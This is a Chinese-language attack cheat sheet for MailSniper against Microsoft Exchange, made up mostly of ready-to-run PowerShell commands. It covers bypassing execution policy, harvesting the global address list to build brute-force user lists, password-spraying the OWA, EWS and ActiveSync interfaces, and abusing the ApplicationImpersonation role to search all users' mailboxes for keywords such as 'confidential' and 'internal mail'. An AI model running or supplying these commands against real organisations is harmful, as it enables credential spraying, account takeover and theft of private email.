下载地址:mailsniper
0x01 mailsniper.ps1获取outlook所有联系人(为爆破收集邮箱)
在域环境内(域内机器即可)执行命令:
powershell -exec bypass
Import-Module .\MailSniper.ps1
Get-GlobalAddressList -ExchHostname owa2013.rootkit.org -UserName rootkit\jerry -Password Admin12345 -OutFile global-address-list.txt
0x02 mailsniper爆破exchange(指定密码爆破邮箱)
针对OWA接口、EWS接口和ActiveSync接口爆破。实际使用过程中可多执行几次,避免遗漏。
powershell -exec bypass
Import-Module .\MailSniper.ps1
Invoke-PasswordSprayEWS -ExchHostname owa2013.rootkit.org -UserList .\users.txt -Password Admin12345 -ExchangeVersion Exchange2013_SP1
-ExchHostname:ping -a exchange服务器ip -> 得到主机名 -> 主机名拼接域名(如:owa2013.rootkit.org)
-ExchangeVersion:若不知道可先不指定
0x03 MailSniper检索邮件内容
MailSniper可以被用户或管理员用于检索查找自己邮箱和文件夹信息,而攻击者利用该工具,也可以在获得合法邮箱凭证之后,通过检索邮箱文件夹来尝试发现和窃取包含敏感信息的邮件数据。Mailsniper包含两个主要的cmdlet,分别是Invoke-SelfSearch和Invoke-GlobalMailSearch,用于检索邮件中的关键字。
查找当前用户的Exchange邮箱数据
Invoke-SelfSearch -Mailbox zhangsan@fb.com -Terms *机密* -Folder 收件箱 -ExchangeVersion Exchange2013_SP1
# 查找邮件内容中包含pwn字符串的邮件,-Folder参数可以指定要搜索的文件夹,默认是inbox,使用时最好指定要搜索的文件夹名称(或者指定all查找所有文件),因为该工具是外国人写的,Exchange英文版收件箱为Inbox,当Exchange使用中文版时收件箱不为英文名,默认查找inbox文件夹会因找不到该文件而出错
查找所有用户的Exchange邮箱数据
Invoke-GlobalMailSearch -ImpersonationAccount zhangsan -ExchHostname test2k12 -AdminUserName fb.com\administrator -ExchangeVersion Exchange2013_SP1 -Term "*内部邮件*" -Folder 收件箱
# 利用administrator管理员用户为普通用户zhangsan分配ApplicationImpersonation角色,检索所有邮箱用户的邮件中,包括“内部邮件”关键字的内容
0x04 参考
https://github.com/dafthack/mailsniper(一些详细的使用介绍)
https://www.freebuf.com/articles/web/193132.html